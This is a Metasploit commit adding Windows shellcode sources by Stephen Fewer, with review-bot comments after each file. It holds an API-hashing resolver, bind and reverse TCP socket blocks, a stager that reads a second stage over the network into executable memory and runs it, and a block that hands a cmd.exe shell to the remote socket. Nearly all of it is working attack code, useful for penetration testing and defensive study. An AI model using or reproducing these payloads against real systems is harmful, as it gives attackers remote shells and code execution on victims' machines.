Overhaul of the metasploit payloads from Stephen Fewer - smaller/cleaner/new hashing/support for WinNT 4.0 -> Win7 with size reductions for the stagers and minimal size increases for the singles
git-svn-id: file:///home/svn/framework3/trunk@6922 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
91faadd782
commit
49b7dcb30c
|
@ -0,0 +1,98 @@
|
|||
#=============================================================================#
|
||||
# A simple python build script to build the singles/stages/stagers and
|
||||
# some usefull information such as offsets and a hex dump. The binary output
|
||||
# will be placed in the bin directory. A hex string and usefull comments will
|
||||
# be printed to screen.
|
||||
#
|
||||
# Example:
|
||||
# >python build.py stager_reverse_tcp_nx
|
||||
#
|
||||
# Example, to build everything:
|
||||
# >python build.py all > build_output.txt
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
import os, sys, time
|
||||
from subprocess import Popen
|
||||
from struct import pack
|
||||
#=============================================================================#
|
||||
def clean( dir="./bin/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
os.remove( os.path.join( root, name ) )
|
||||
#=============================================================================#
|
||||
def locate( src_file, dir="./src/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
if src_file == name:
|
||||
return root
|
||||
return None
|
||||
#=============================================================================#
|
||||
def build( name ):
|
||||
location = locate( "%s.asm" % name )
|
||||
if location:
|
||||
input = os.path.normpath( os.path.join( location, name ) )
|
||||
output = os.path.normpath( os.path.join( "./bin/", name ) )
|
||||
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
|
||||
p.wait()
|
||||
xmit( name )
|
||||
else:
|
||||
print "[-] Unable to locate '%s.asm' in the src directory" % name
|
||||
#=============================================================================#
|
||||
def xmit_dump_ruby( data, length=16 ):
|
||||
dump = ""
|
||||
for i in xrange( 0, len( data ), length ):
|
||||
bytes = data[ i : i+length ]
|
||||
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
|
||||
if i+length <= len(data):
|
||||
hex += " +"
|
||||
dump += "%s\n" % ( hex )
|
||||
print dump
|
||||
#=============================================================================#
|
||||
def xmit_offset( data, name, value ):
|
||||
offset = data.find( value );
|
||||
if offset != -1:
|
||||
print "# %s Offset: %d" % ( name, offset )
|
||||
#=============================================================================#
|
||||
def xmit( name, dump_ruby=True ):
|
||||
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
|
||||
f = open( bin, 'rb')
|
||||
data = f.read()
|
||||
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
|
||||
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
|
||||
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
|
||||
if dump_ruby:
|
||||
xmit_dump_ruby( data )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: build.py [clean|all|<name>]"
|
||||
else:
|
||||
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "clean":
|
||||
clean()
|
||||
elif argv[1] == "all":
|
||||
for root, dirs, files in os.walk( "./src/single/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stage/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stager/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
else:
|
||||
build( argv[1] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
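Review bot: The assembler invocation in `build()`, `Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )`, packs an option and its value into single argv elements, so nasm receives `-f bin` and `-o <path>` as one token each and has to tolerate the embedded space; the conventional list form is `["nasm", "-f", "bin", "-O3", "-o", "%s.bin" % output, "%s.asm" % input]`. The result of `p.wait()` is discarded, so an assembly error is only surfaced indirectly when `xmit( name )` fails to open the missing .bin and `main()` prints the exception; checking `p.returncode` before calling `xmit()` would report the failure where it happens. In `xmit()` the handle from `f = open( bin, 'rb')` is never closed; `with open( bin, 'rb' ) as f:` releases it. `input` in `build()` also shadows the builtin of that name.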
|
@ -0,0 +1,97 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 137 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
|
||||
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
|
||||
; Output: The return value from the API call will be in EAX.
|
||||
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
|
||||
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
|
||||
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
|
||||
; Note: This function is unable to call forwarded exports.
|
||||
|
||||
api_call:
|
||||
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
|
||||
mov ebp, esp ; Create a new stack frame
|
||||
xor edx, edx ; Zero EDX
|
||||
mov edx, [fs:edx+48] ; Get a pointer to the PEB
|
||||
mov edx, [edx+12] ; Get PEB->Ldr
|
||||
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
|
||||
next_mod: ;
|
||||
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
|
||||
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
|
||||
xor edi, edi ; Clear EDI which will store the hash of the module name
|
||||
loop_modname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the name
|
||||
cmp al, 'a' ; Some versions of Windows use lower case module names
|
||||
jl not_lowercase ;
|
||||
sub al, 0x20 ; If so normalise to uppercase
|
||||
not_lowercase: ;
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
loop loop_modname ; Loop untill we have read enough
|
||||
; We now have the module hash computed
|
||||
push edx ; Save the current position in the module list for later
|
||||
push edi ; Save the current module hash for later
|
||||
; Proceed to itterate the export address table,
|
||||
mov edx, [edx+16] ; Get this modules base address
|
||||
mov eax, [edx+60] ; Get PE header
|
||||
add eax, edx ; Add the modules base address
|
||||
mov eax, [eax+120] ; Get export tables RVA
|
||||
test eax, eax ; Test if no export address table is present
|
||||
jz get_next_mod1 ; If no EAT present, process the next module
|
||||
add eax, edx ; Add the modules base address
|
||||
push eax ; Save the current modules EAT
|
||||
mov ecx, [eax+24] ; Get the number of function names
|
||||
mov ebx, [eax+32] ; Get the rva of the function names
|
||||
add ebx, edx ; Add the modules base address
|
||||
; Computing the module hash + function hash
|
||||
get_next_func: ;
|
||||
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
|
||||
dec ecx ; Decrement the function name counter
|
||||
mov esi, [ebx+ecx*4] ; Get rva of next module name
|
||||
add esi, edx ; Add the modules base address
|
||||
xor edi, edi ; Clear EDI which will store the hash of the function name
|
||||
; And compare it to the one we want
|
||||
loop_funcname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the ASCII function name
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
|
||||
jne loop_funcname ; If we have not reached the null terminator, continue
|
||||
add edi, [ebp-8] ; Add the current module hash to the function hash
|
||||
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
|
||||
jnz get_next_func ; Go compute the next function hash if we have not found it
|
||||
; If found, fix up stack, call the function and then value else compute the next one...
|
||||
pop eax ; Restore the current modules EAT
|
||||
mov ebx, [eax+36] ; Get the ordinal table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
|
||||
mov ebx, [eax+28] ; Get the function addresses table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
|
||||
add eax, edx ; Add the modules base address to get the functions actual VA
|
||||
; We now fix up the stack and perform the call to the desired function...
|
||||
finish:
|
||||
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
|
||||
pop ebx ; Clear off the current modules hash
|
||||
pop ebx ; Clear off the current position in the module list
|
||||
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
|
||||
pop ecx ; Pop off the origional return address our caller will have pushed
|
||||
pop edx ; Pop off the hash value our caller will have pushed
|
||||
push ecx ; Push back the correct return value
|
||||
jmp eax ; Jump into the required function
|
||||
; We now automagically return to the correct caller...
|
||||
get_next_mod: ;
|
||||
pop eax ; Pop off the current (now the previous) modules EAT
|
||||
get_next_mod1: ;
|
||||
pop edi ; Pop off the current (now the previous) modules hash
|
||||
pop edx ; Restore our position in the module list
|
||||
mov edx, [edx] ; Get the next module
|
||||
jmp short next_mod ; Process this module
|
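Review bot: The comment on `pushad`, "We preserve all the registers for the caller, bar EAX and ECX", disagrees with the header ("Clobbers: EAX, ECX and EDX") and with the `popad` comment ("bar EAX, ECX and EDX which are clobbered"); it should read `pushad ; We preserve all the registers for the caller, bar EAX, ECX and EDX.`. The case normalisation `cmp al, 'a'` / `jl not_lowercase` / `sub al, 0x20` subtracts 0x20 from every byte in 0x61..0x7F, not only letters, while hash.py's `unicode()` relies on `string.upper()`, so the two agree only for module names made of ASCII letters, digits and punctuation below 'a'; a comment such as `; Assumes module names are plain ASCII; must match the uppercase rule in hash.py` would record that coupling. The comments also carry several typos worth fixing ("allready", "itterate", "untill", "searchnig", "origional").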
|
@ -0,0 +1,63 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the newly connected clients socket
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
bind_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
xor ebx, ebx ; Clear EBX
|
||||
push ebx ; bind to 0.0.0.0
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save a pointer to sockaddr_in struct
|
||||
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
|
||||
push esi ; pointer to the sockaddr_in struct
|
||||
push edi ; socket
|
||||
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
|
||||
call ebp ; bind( s, &sockaddr_in, 16 );
|
||||
|
||||
push ebx ; backlog
|
||||
push edi ; socket
|
||||
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
|
||||
call ebp ; listen( s, 0 );
|
||||
|
||||
push ebx ; we set length for the sockaddr struct to zero
|
||||
push ebx ; we dont set the optional sockaddr param
|
||||
push edi ; listening socket
|
||||
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
|
||||
call ebp ; accept( s, 0, 0 );
|
||||
|
||||
push edi ; push the listening socket to close
|
||||
mov edi, eax ; swap the new connected socket over the listening socket
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
|
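Review bot: The header line "Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)" omits EBX, which `xor ebx, ebx` zeroes and the `bind`, `listen` and `accept` argument pushes then rely on; it should read `; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)`. The same omission does not apply to block_reverse_tcp.asm, which leaves EBX untouched, so the two headers should not simply be copied from one another. Minor: "push a pointer to this stuct" should be "struct" (the typo is repeated in block_reverse_tcp.asm).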
|
@ -0,0 +1,52 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 31 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
|
||||
; will let the UnhandledExceptionFilter function perform its default handling
|
||||
; routine.
|
||||
;
|
||||
; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
|
||||
; process to terminate.
|
||||
;
|
||||
; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
|
||||
; current thread to terminate. On Windows 2008, Vista and 7 this function is
|
||||
; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
|
||||
; called by the api_call function.
|
||||
;
|
||||
; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
|
||||
; the current thread to terminate. This function is not available on Windows
|
||||
; NT or 2000.
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Windows 7 6.1
|
||||
; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
|
||||
; Windows Server 2008 6.0 RtlExitUserThread instead.
|
||||
; Windows Vista 6.0 _______________________________________________
|
||||
; Windows Server 2003 R2 5.2
|
||||
; Windows Server 2003 5.2
|
||||
; Windows XP 5.1
|
||||
; Windows 2000 5.0
|
||||
; Windows NT4 4.0
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, (ESP will also be modified)
|
||||
; Note: Execution is not expected to (successfully) continue past this block
|
||||
|
||||
exitfunk:
|
||||
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
|
||||
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
|
||||
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
|
||||
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
|
||||
jl short goodbye ; Then just call the exit function...
|
||||
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
|
||||
jne short goodbye ;
|
||||
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
|
||||
goodbye: ; We now perform the actual call to the exit function
|
||||
push byte 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; call EXITFUNK( 0 );
|
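Review bot: `cmp bl, 0xE0` compares only the low byte of the EXITFUNK hash with the low byte of ExitThread's 0x0A2A1DE0, so the substitution to RtlExitUserThread is correct only as long as no other supported EXITFUNK hash ends in 0xE0; the hashes in the header (0xEA320EFE, 0x56A2B5F0, 0x6F721347) satisfy this today but the assumption is undocumented. A comment on that line, `cmp bl, 0xE0 ; Low byte only: every other EXITFUNK hash must differ from ExitThread's in its low byte`, makes the constraint visible to whoever adds the next exit function. The comment on `mov ebx, 0x0A2A1DE0` could also mention that build.py's `xmit_offset()` locates this constant so the framework can patch it.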
|
@ -0,0 +1,44 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Compatible: block_bind_tcp, block_reverse_tcp
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
|
||||
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push byte 0 ; flags
|
||||
push byte 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
push byte 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
mov ebx, eax ; ebx = our new memory address for the new stage
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
read_more: ;
|
||||
push byte 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stages RWX buffer
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
||||
ret ; return into the second stage
|
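Review bot: The header documents inputs, outputs and clobbers but not the block's failure behaviour: the value returned by `recv` feeds `add ebx, eax` / `sub esi, eax` and the value returned by `VirtualAlloc` is taken as the buffer in `mov ebx, eax`, in both cases without being checked. A header line such as `; Note: return values of recv and VirtualAlloc are not checked; a closed connection or a failed allocation is not handled.` would state the contract the caller is accepting. Minor: "recieved" in "push the newly recieved second stage length" should be "received".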
|
@ -0,0 +1,45 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the socket for the connection to the server
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
reverse_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
push 0x0100007F ; host 127.0.0.1
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save pointer to sockaddr struct
|
||||
push byte 16 ; length of the sockaddr struct
|
||||
push esi ; pointer to the sockaddr struct
|
||||
push edi ; the socket
|
||||
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
|
||||
call ebp ; connect( s, &sockaddr, 16 );
|
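Review bot: The prologue from `push 0x00003233` through `mov edi, eax` (LoadLibraryA of ws2_32, WSAStartup, WSASocketA) is byte-for-byte the same as the opening of block_bind_tcp.asm, and only the sockaddr/`connect` tail differs; factoring the shared part into its own block include would keep the two from drifting apart (the "stuct" typo has already been copied into both). If the duplication is intentional for size or layout reasons, a one-line comment saying so at the top of each block would save the next reader from attempting the refactor.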
|
@ -0,0 +1,49 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be a socket.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
|
||||
|
||||
shell:
|
||||
push 0x00646D63 ; push our command line: 'cmd',0
|
||||
mov ebx, esp ; save a pointer to the command line
|
||||
push edi ; our socket becomes the shells hStdError
|
||||
push edi ; our socket becomes the shells hStdOutput
|
||||
push edi ; our socket becomes the shells hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop: ;
|
||||
push esi ; push a null dword
|
||||
loop push_loop ; keep looping untill we have pushed enough nulls
|
||||
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push ebx ; Set the lpCommandLine to point to "cmd",0
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
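Review bot: The stack layout that makes `[esp + 60]`, `[esp + 16]` and `68` correct is never spelled out, even though it is what the 18 null pushes plus the three `push edi` are building: a 16-byte PROCESS_INFORMATION at ESP followed by a 68-byte STARTUPINFO at ESP+16 (72 + 12 = 84 bytes), with the three socket pushes landing in hStdInput/hStdOutput/hStdError at the end of STARTUPINFO and `[esp + 60]` being its dwFlags. A comment before `push byte 18`, `; Build PROCESS_INFORMATION (16 bytes) at ESP and STARTUPINFO (68 bytes) at ESP+16; the three EDI pushes above become its hStd* handles`, would make the constants verifiable. Minor wording: "in order to inheritable all possible handle from the parent" should read "so the child inherits all inheritable handles from the parent".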
|
@ -0,0 +1,146 @@
|
|||
#=============================================================================#
|
||||
# This script can detect hash collisions between exported API functions in
|
||||
# multiple modules by either scanning a directory tree or just a single module.
|
||||
# This script can also just output the correct hash value for any single API
|
||||
# function for use with the 'api_call' function in 'block_api.asm'.
|
||||
#
|
||||
# Example: Detect fatal collisions against all modules in the C drive:
|
||||
# >hash.py /dir c:\
|
||||
#
|
||||
# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
|
||||
# >hash.py /mod c:\windows\system32\ kernel32.dll
|
||||
#
|
||||
# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
|
||||
# >hash.py kernel32.dll WinExec
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
from sys import path
|
||||
import os, time, sys
|
||||
|
||||
# Modify this path to pefile to suit your machine...
|
||||
pefile_path = "D:\\Development\\Frameworks\\pefile\\"
|
||||
|
||||
path.append( pefile_path )
|
||||
import pefile
|
||||
#=============================================================================#
|
||||
collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
|
||||
( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
|
||||
( 0x6737DBC2, "ws2_32.dll!bind" ),
|
||||
( 0xFF38E9B7, "ws2_32.dll!listen" ),
|
||||
( 0xE13BEC74, "ws2_32.dll!accept" ),
|
||||
( 0x614D6E75, "ws2_32.dll!closesocket" ),
|
||||
( 0x6174A599, "ws2_32.dll!connect" ),
|
||||
( 0x5FC8D902, "ws2_32.dll!recv" ),
|
||||
( 0x5F38EBC2, "ws2_32.dll!send" ),
|
||||
|
||||
( 0x5BAE572D, "kernel32.dll!WriteFile" ),
|
||||
( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
|
||||
( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
|
||||
( 0xE449F330, "kernel32.dll!GetTempPathA" ),
|
||||
( 0x528796C6, "kernel32.dll!CloseHandle" ),
|
||||
( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
|
||||
( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
|
||||
( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
|
||||
( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
|
||||
( 0x7802F749, "kernel32.dll!GetProcAddress" ),
|
||||
( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
|
||||
( 0x876F8B31, "kernel32.dll!WinExec" ),
|
||||
( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
|
||||
( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
|
||||
( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
|
||||
( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
|
||||
|
||||
( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
|
||||
|
||||
( 0x23E38427, "advapi32.dll!RevertToSelf" )
|
||||
]
|
||||
|
||||
collisions_detected = {}
|
||||
modules_scanned = 0
|
||||
functions_scanned = 0
|
||||
#=============================================================================#
|
||||
def ror( dword, bits ):
|
||||
return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
|
||||
#=============================================================================#
|
||||
def unicode( string, uppercase=True ):
|
||||
result = "";
|
||||
if uppercase:
|
||||
string = string.upper()
|
||||
for c in string:
|
||||
result += c + "\x00"
|
||||
return result
|
||||
#=============================================================================#
|
||||
def hash( module, function, bits=13, print_hash=True ):
|
||||
module_hash = 0
|
||||
function_hash = 0
|
||||
for c in unicode( module + "\x00" ):
|
||||
module_hash = ror( module_hash, bits )
|
||||
module_hash += ord( c )
|
||||
for c in str( function + "\x00" ):
|
||||
function_hash = ror( function_hash, bits )
|
||||
function_hash += ord( c )
|
||||
h = module_hash + function_hash & 0xFFFFFFFF
|
||||
if print_hash:
|
||||
print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
|
